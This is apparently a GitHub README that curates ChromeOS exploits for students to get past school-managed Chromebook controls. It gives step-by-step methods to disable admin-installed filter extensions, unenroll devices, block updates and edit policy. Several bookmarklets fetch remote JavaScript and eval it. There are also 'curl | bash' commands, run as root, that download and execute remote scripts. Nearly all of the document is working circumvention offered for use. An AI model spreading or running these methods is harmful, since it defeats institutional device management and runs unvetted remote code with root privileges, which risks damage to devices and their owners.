This is a curated list of exploits for ChromeOS. It started with LTBEEF, and now there is more! Many of these exploits can destroy your computer if misused. So PLEASE, PLEASE make sure you follow these instructions very carefully!
Need help? Ask for help here!
Please use these only when you have permission, I (3kh0) do not condone the use of any exploits for illegal purposes!
Image Credit: LittleMissNyan
Thank you to all of the contributors! Yall really are pretty epic :D
- EXT-REMOVER
- Skiovox Unrestricted browsing
- LTBEEF Disable extensions
- LTMEAT Disable extensions
- Temp TMEAT Disable extensions
- Baby LTMEAT Disable extensions
- LTMEAT Print Disable extensions
- Dextensify Disable extensions
- JPCMG LTBEEF w/ Service workers
- Corkey Corrupt extensions
- Extension Launcher Install extensions w/o allowlist
- Point-Blank Execute scripts on extension pages
- UBoss Tamper with IBoss
- CAUB Prevent Updates
- CAUB Flags Prevent Updates
- Blank3r
- sh1mmer Unenrollment
- Downgrading Change versions
- Pollen Policy Editor
- Killcurly Break extensions
- Shimboot Boot Linux
- uBlock Run Run Code On Pages
- Quick View Bypass extensions
- Buypass Bypass extensions
- Chaos Hapara bypass
- SOT Exploit
Table of contents generated with readme-toc
An exploit that allows for browsing within a completely unblocked Chrome browser. It works on ChromeOS 118 and a wide range of previous versions.
- Skiovox utilizes a bug in kiosk apps
- Very similar to a bug from 3 years ago Within the unblocked browser, you can
- Install extensions
- Bypass pretty much all blocks
- Do whatever the honk you want
Bypassi made a wonderful slideshow for you goof balls to follow, view using any of the links below!
- https://www.skiovox.com/skiovox.pdf
- https://drive.google.com/file/d/1tl8eP26MFRejHO38H5HwMLl2VaQrtn0Z/preview
- https://ftp.3kh0.net/Archive/skiovox.pdf
- https://1drv.ms/b/s!Ais5N3vPLTEMh8poZbywnNWdMUrhUA?e=MaCHBx
img/skiovox.pdf
LTBEEF (Literally The Best Exploit Ever Found) is a exploit found by Bypassi (Bypassi#7037) in September 2022, and is a great way to disable spyware that was installed on your chromebook by your school.
Use either of the two bookmarklets below, the instructions are the same for both.
- Copy the Javascript code from either of the two bookmarklets below
- Make a new bookmark on your chromebook
- Put the Javascript code in the URL section of the bookmark
- Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
- If that page does not work, you can just change the end of the URL to anything else, like https://chrome.google.com/webstoreYAAAAAAAAAAAAAAAY
- Click on the bookmark you made
- Switch off the extentions you don't want to have anymore.
- You're done! The extention should now be disabled.
Please note that this exploit has been patched for quite some time
javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
Literally The Meatiest Exploit of All Time
- Find a page belonging to the extension you want to disable.
chrome://extensions
,chrome://extensions-internals
, andchrome://process-internals
are all good places to find your extension's ID (a 32-character lowercase string). You can also do a simple Google search. Once you have your ID, substitute it into the hostname in the URL below:
chrome-extension://extensionidhereblahblah/manifest.json
For some filters like Securly, the block screen is already an extension page.
- Bookmark the extension page (bookmark A) if you wish. Then, bookmark
chrome://kill
(B) andchrome://hang
(C). - On the extension page (A), click the
chrome://kill
bookmark (B). The page should crash. You should already have the next step prepared. - Instantly start spamming
chrome://hang
(bookmark C) and quickly reload the page while spamming (ideally with the refresh key on your keyboard orctrl
+R
). You should have reloaded within one or two seconds of killing the page. - If the extension page (bookmark A) no longer loads, then LTMEAT worked! You can close your tabs, and the extension will be dead. If nothing loads, you probably reloaded too late or spammed too slowly. This isn't rocket science! Restart your computer to revert back to normal.
Exploit made by Bypassi#7037, learn why this works.
I had far too much faith in society when making this page. Some of you skids out there are really, really stupid and also can't read. So here are the answers to some commonly asked questions.
How do I get an extension ID?
Okay, fair. Extension IDs are leaked in a couple of places. Generally, the best way to get them is to go to extension settings and copy the URL query value.
It says blocked by client?
That's the message you get when you try to visit a page belonging to an extension that doesn't exist. The error message (ERR_BLOCKED_BY_CLIENT
) is highly misleading. Nobody blocked it. You need to find the correct extension ID (see above).
If you got this because you tried to visit the extension_id_here
example URL, you should be extremely ashamed of yourself. Please change and grow as a person.
I don't have a bookmarks bar!!!!
First, try running ctrl+shift+B. If that doesn't work, go to chrome://settings
and turn on the "home button" feature, then set it to chrome://hang
. A home icon should appear to the right of your refresh icon in the top left. Use that instead of bookmark C.
There is a version where you don't need bookmarklets, but I am currently gatekeeping it (L). Check this site daily to see if new alternate instructions have been posted.
I disabled an extension, but now I can't load websites!
If you just read the write-up, you'd know that this would happen if the extension's background page loaded and its listeners were already initialized before you used chrome://hang
. You can double-check whether the extension is listening using chrome://extensions-internals
, assuming you have a few brain cells in your head.
Anyway, no listeners mean you were too slow. Either you waited more than three seconds between bookmark B and reloading the page, or you needed to be spamming bookmark C faster. The most reliable fix is to restart your computer and try again. Try to match the pace of the gif below: (note the reload)
The bookmarks don't do anything when I click them!
Might be admin-blocked. Either be smart enough to figure out another way or check this site daily to see if new alternate instructions have been posted.
I disabled the extension. Why is some stuff still blocked?
I have bad news for you... not all filters are Chrome Extensions. Again, make sure the extension pages (like bookmark A) are frozen before you assume that your skiddy self successfully did the exploit.
A method of using LTMEAT that does not require chrome://
urls. This works by using 80-150 tabs to soak up memory.
- Create a bookmark with the link
chrome://extensions/?id=extension_id_here
and name itKill switch
. - Create a new bookmark folder. Name it
spam.js
. Next, paste this link into your browser:chrome-extension://extension_id_here/background.js
- Then right-click on your folder and hit
Add Page
. Press Enter. - Right-click on the folder again and hit
Bookmark Manager
. You should see your page. Click on it and hitCtrl
+C
. PressCtrl
+V
until you have 38 of them. - Go to a new tab and right-click your folder. Press
Open All (38)
. - Repeat step 3, then click on one of the tabs from this batch. Wait until the
This page is taking too long
popup appears. This will take 30-60 seconds. If it doesnโt, dochrome://restart
and go back to step 2 and add 3-4 more pages to the folder. - Once the popup happens, right-click on one of the tabs closest to the right of the screen and hit
Duplicate
. Then, go to yourKill switch
bookmark and look for a switch to flip,Allow Access to File:// urls
. Then, click on the leftmost extension tab (one that opened from the main.js folder) and clickClose all tabs to the right
. KEEP THIS TAB OPEN!!!
Tips: Go to chrome://settings/performance
and turn Memory Saver off, and in the box where it says Keep these sites always active
, paste in the extension URL. Iโve noticed clicking on one of the tabs from the second batch seems to help with reliability.
BABY METHOD FOR THE TECHNOLOGICALLY CHALLENGED.
- Follow step one of the original instructions to find a page belonging to the Chrome extension you want to disable.
- Visit that
chrome-extension://extension_id_here
page, then typechrome://hang
in the URL bar of that tab. It should start loading infinitely. - Right-click the tab and duplicate it. Don't close anything.
- Go to the
chrome://extensions
page for the blocker extension you want to Disable. - If that page has any switch, such as
Allow access to file URLs
, click that switch. If you don't see any clickable switches, this exploit will not work - The extension should now be broken, assuming you clicked the switch! Only one of the two duplicate tabs should be left standing. You can close your tabs now.
- Find your extension's largest file. This can usually be found by using Rob Wu's crxviewer
- Go to that page and run
Ctrl
+P
. A print window should show up, with several pages in the top right. - Do everything you can to increase that number. Shrink down margins, change layout to landscape, anything you can. The higher you get that number, the longer the effect will last.
- Reload. The page should start hanging.
- Go to your extension's settings page,
chrome://extensions
. - Duplicate your "printing" tab, and go back to your extension's settings page.
- Flip any switch you can find there. Usually, there'll be one titled
Allow access to file URLs
.
First, find your extension's ID. This is a 32-character code found on your extension's settings page, normally near or at the top.
Then go to chrome-extension://extension_id_here/manifest.json
Credit to Bypassi for the original LTMEAT framework, and to Swordmaster4321 for discovering that pages can be hung with printing.
Dextensify is an exploit that lets you disable most admin-installed Chrome extensions from any webpage. It can be used from regular websites, HTML files, and data URLs.
Go here and follow instructions: Dextensify Main HTML, or download the file here Dextensify.html
Download mirror: ftp.3kh0.net
Made by ading2210
Requirements
chrome://serviceworker-internals
- Inspect element
- Go to
chrome://serviceworker-internals
- Find your extension, this exploit will not work if you can't find it. Some extensions will not work with this exploit.
- Hit the start button then the
Inspect
button, and execute LTBEEF code
chrome.management.setEnabled('extension_id_here',false)
Thanks to Nyaann#3881 for this exploit
- Esc+Refresh+Power and re-enroll (Enter recovery page), or you can just powerwash.
- Log into your Chromebook and immediately turn off WiFi and do refresh+power to (instant restart)
- Log back into your Chromebook with the WiFi off. Look for a option to login as a existing user and click that.
- Go to
chrome://extensions
, turn on WiFi, and wait for your school's blocking extension to appear. - As soon as it appears, turn off WiFi and instant restart as fast as you can.
- Log back in, go back to extensions, and wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked (wait at least a minute with a close watch in case it comes back)
- If it didn't work, start over. You have to be fast.
A bookmarklet capable of installing extensions, for those without an allowlist.
- Access to the Chrome Web Store
- A Chromebook without allowlist
- Bookmarklets enabled
- Go to
ext-launcher-bookmarklet.js
and save the code as a bookmarklet. - Go to The Chrome Webstore and use the bookmarklet
- Then put the icon of the extension, the id, and the name of it (This does not matter, you can put anything), then press download, and it will work.
- Credit to "Aka, but nice" on Discord.
- DNS will be up soon for those who have JavaScript bookmarklets blocked.
- This will not work if you have a blocklist this is only for if when you go to the web store it shows blocked
This exploit allows you to execute scripts on extension pages, this is a great example of how Chromebooks are a piece of garbage.
- Bookmarklets enabled
- Access to a working brain
- Go to
newpointblank.js
and save the code as a bookmarklet on your Chromebook. - Now find your blocker from the list below.
If it says blocked by Chrome, reload (you have to actually have Securly ofc)
If your school updated GoGuardian, this exploit may not work.
- Now most of these links are a block page (this is intentional)
- Each page should have a blue link, click the link on the page if it opens a blank page click the bookmarklet that you just made
- Click either hard disable or soft disable, soft disable will only disable it until you restart your Chromebook.
- You can also run some of the scripts and run your own code, your extension may disable javascript running on it, so running your own code may not work.
- I recommend doing soft disable, which only disables it until restart.
- The idea was from Bypassi#7037
This works only for iBoss, and Blocksi, If you don't have one of these, use New Point Blank.
- Bookmarklets enabled
- Access to a working brain
- Go to the corresponding link for your blocker below.
iBoss: tinyurl.com/byeswamp
Blocksi: tinyurl.com/blockboss
Then bookmark the code below:
javascript:opener.eval(`fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close();
- Then go to the site with your blocker that was listed above.
- Run the code. Follow the instructions there.
If it doesn't work let us know by creating a discussion, this was made in partnership with akabutnice
and bypassi
.
This exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by Catakang#0987. Using onc files, you can convince your Chromebook that the WiFi that you're connected to is pay-to-use (like a hotspot using data), and thus it will not check for updates.
- Access to
chrome://network#state
- Go to
chrome://network#state
. - Scroll to the bottom of the page. You will see a list of WiFi that you have connected to before.
- Click the
+
sign next to the WiFi name of each network that you commonly connect your Chromebook to. - We are going to make it when the Chromebook is connected to those networks, it will not check for updates.
- Use ctrl+a and ctrl+c to copy all the text on the entire network#state page.
- Go to caub.glitch.me.
- Paste the copied text into the textbox below.
- Press the
generate onc
button below the textbox. - Once you have downloaded the file, go to
chrome://network#general
. - Click on the
import ONC
button. - Import the newly-downloaded file.
Extra notes
- Your Chromebook will no longer automatically update. (as long as you are on a wifi that you CAUBed)
- Be careful not to stay on wifi for too long without using CAUB on it, otherwise, you might update.
- We cannot guarantee that this will work on every wifi, but it should work on most.
This alt exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by MechaXYZ. Using a Chrome flag, you can convince your Chromebook not to automatically update.
- Access to
chrome://flags
- Go to
chrome://flags#show-metered-toggle
or search "metered" inchrome://flags
instead. - Enable it and restart your device.
- Open the Settings app.
- Go to your Network >> Advanced >> Show metered toggle and turn it on
Extra notes
- Your Chromebook will no longer automatically update. (as long as you have the flag enabled)
- And you must be able to enable flags if it ain't blocked otherwise, this exploit won't work
Blank3r is an exploit that allows you to run bookmarklets on privileged pages, such as the Chrome extensions page. This exploit was made with Point Blank as well.
- Bookmarklets enabled
- Bookmark this code:
javascript:let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);
- Navigate to
chrome://extensions
. - Click on an extension that YOU installed from the Chrome Web Store > Details.
- In the URL bar, copy the string of letters and numbers after the
/?id=
. - Click "View in Chrome Web Store" and spam the escape key. If it loads into Chrome Webstore try again, if it is a blank screen click the bookmarklet.
- Paste the ID of the extension into the prompt separated by commas.
If you close the tab, the exploit will stop working.
SH1MMER is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by the Mercury Workshop team and was released on January, Friday the 13th, 2023.
Due to the detail this exploit requires, please check out the offical website: sh1mmer.me
Downgrading can be used for several exploits, to get to a version that does not have patches for certain exploits, such as LTBEEF. This is a built-in feature of ChromeOS.
Please do note that recently, they have patched downgrading on most devices up to a certain version., so this may not work for you.
- A USB thumb drive with at least 4GB of storage, some boards have small or bigger images, I recommend 16GB
- A personal computer with access to downloading extensions
- Navigate to
chrome://version
on the Chromebook you wish to downgrade and check for your board underPlatform
. For me, that would be octopus.
- Navigate to chrome100.dev , press
ctrl+f
and type in your board. - Find and download the Chrome version you want to your personal computer.
- Install Chromebook Recovery Utility onto your personal computer.
- Open the extension, click on the settings button in the top right-hand corner, and click "Use local image".
- Select the recovery image you downloaded from chrome100.
- Plug in the USB you wish to use, and follow the prompts on the screen.
- On your Chromebook, press esc+reload+power and follow the prompts.
- On the checking for updates screen, press
ctrl
+shift
+e
to skip the "checking for updates" screen.
chromeOS User Policy Editor
- Devmode NEEDS to be enabled.
There are two modes for this, I recommend just using the first one.
- Open Crosh (Ctrl+Alt+T)
- Run the following commands:
shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash
- Done! It may take a few seconds for the new policy to apply. If it does not apply, press
alt+vol_up+x
.
Disabling RootFS will Soft-Brick your Chromebook when booting back into normal mode.
- Open Crosh (Ctrl+Alt+T)
- Run the following commands:
shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/RootFS.sh | bash
- Reboot
- Go Through Steps 1-3 Again
- Run the following command:
curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash
- Done! Your Pollen configuration is now permanently applied!
Kill the extension by signing out.
- Visit
chrome://settings/signOut
. - Press the big blue button.
- Go to
chrome://restart
- Now visit
tinyurl.com/AddSession
or this link - Add your SCHOOL account back. It WILL NOT WORK if you add a home account back. This is just so you can still access Google Drive, YouTube, and any Google service.
- All extensions should stop working.
- Note that you must repeat this every time you restart or sign out.
- If your Chrome version is v112 or above, this exploit will no longer work, the bypass to this is listed further on.
Credit to Zoroark
Shimboot is a collection of scripts for patching a Chrome OS RMA shim to serve as a bootloader for a standard Linux distribution. It allows you to boot a full desktop Debian install on a Chromebook, without needing to unenroll it or modify the firmware.
For more detailed information, please see the project's README.
Credit to vk6 for this exploit
If your school allows the uBlock Origin chrome extension, then running any bookmarklet is possible.
- uBlock Origin
-
Make sure you have uBlock Origin installed.
-
Go to the extension's settings
-
Under the settings tab, check the "I am an advanced user" box, then click on the small cog icon.
-
Find
userResourcesLocation
and change it fromunset
tohttps://raw.githubusercontent.com/3kh0/ext-remover/main/ublockExec.js
-
Goe My filters tab of the settings and add the following line:
*##+js(execute_script.js)
- Now press ctr+alt+tilde (~) to run code on the current page
- Have fun!
QuickView is a universal webview exploit in Chrome OS that utilizes the QuickOffice component extension. This exploit lets you create login windows with arbitrary URLs, thus allowing you to load pages without any extensions.
Go to quickview-exploit.pages.dev and follow the instructions
Please note that you need to be able to run bookmarklets for this exploit to work.
- This only lasts for 3 minutes!
- Pages visited in this window will not be saved to your history, but their cookies will be saved.
- You can right-click on the window to go back and forward.
- There's no good way to make the text in the window larger.
- This won't bypass network filters.
- You can't log into non-school accounts.
- It's completely possible that some filters could read and block the data sent within the window.
Visit any of the links below:
- https://buypass.bypassi.com
- https://buypass.brandonprather.repl.co
- https://buypass.glitch.me
- https://buypass.netlify.app
Devtools must not be blocked by policy to perform this exploit.
Go to this link and follow instructions
- Download this extension One Tab
- Click the import button in the settings tab.
- Copy-paste the URL you wish to visit about 100 times, and then click import.
- Spam click the top link, then either spam escape on one of them or wait for one to load on a about:blank page.
Credit to Coding4Hours